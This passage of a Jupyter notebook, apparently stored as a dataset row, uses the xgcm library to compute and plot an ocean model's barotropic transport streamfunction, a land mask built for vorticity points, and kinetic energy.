"## Barotropic Transport Streamfunction\n\nWe can use the barotropic velocity to calcuate the barotropic transport streamfunction, defined via\n\n$$ u_{bt} = - \\frac{\\partial \\Psi}{\\partial y} \\ , \\ \\ v_{bt} = \\frac{\\partial \\Psi}{\\partial x} \\ .$$\n\nWe calculate this by integrating $u_{bt}$ along the Y axis using the grid object's `cumsum` method:",
"_____no_output_____"
]
],
[
[
"psi = grid.cumsum(-u_bt * ds.dyG, 'Y', boundary='fill')\npsi",
"_____no_output_____"
]
],
[
[
"We see that xgcm automatically shifted the Y-axis position from center (YC) to left (YG) during the cumsum operation.\n\nWe convert to sverdrups and plot with a contour plot.",
"_____no_output_____"
]
],
[
[
"(psi[0] / 1e6).plot.contourf(levels=np.arange(-160, 40, 5))",
"_____no_output_____"
]
],
[
[
"This doesn't look nice because it lacks a suitable land mask. The dataset has no mask provided for the vorticity point. But we can build one with xgcm!",
"_____no_output_____"
]
],
[
[
"maskZ = grid.interp(ds.hFacS, 'X')\n(psi[0] / 1e6).where(maskZ[0]).plot.contourf(levels=np.arange(-160, 40, 5))",
"_____no_output_____"
]
],
[
[
"## Kinetic Energy\n\nFinally, we plot the kinetic energy $1/2 (u^2 + v^2)$ by interpoloting both quantities the cell center point.",
"_____no_output_____"
]
],
[
[
"ke = 0.5*(grid.interp((ds.UVEL*ds.hFacW)**2, 'X') + grid.interp((ds.VVEL*ds.hFacS)**2, 'Y'))\nke[0,0].where(ds.maskC[0]).plot()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
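The xgcm record above builds every diagnostic from the same pattern: difference a staggered field along an axis with `grid.diff`, then divide by a grid metric. A minimal, self-contained sketch of that pattern on a toy one-dimensional periodic axis; the grid size, spacing, and field are made up, and it assumes an xgcm version that detects comodo-style `axis`/`c_grid_axis_shift` coordinate attributes:

```python
import numpy as np
import xarray as xr
import xgcm

# Toy periodic X axis: cell centers x_c and left cell faces x_g.
n = 8
ds = xr.Dataset(
    coords={
        "x_c": ("x_c", np.arange(0.5, n), {"axis": "X"}),
        "x_g": ("x_g", np.arange(0.0, n), {"axis": "X", "c_grid_axis_shift": -0.5}),
    }
)
grid = xgcm.Grid(ds, periodic=["X"])

u = xr.DataArray(np.sin(2 * np.pi * ds.x_g / n), dims=["x_g"])  # velocity on faces
dx = 1.0                                                        # uniform spacing (made up)

# Finite-volume style derivative: difference face values onto cell centers,
# mirroring the delta_i(...)/A_c recipe used for the divergence above.
dudx = grid.diff(u, "X") / dx
print(dudx.dims)  # ('x_c',)
```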
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.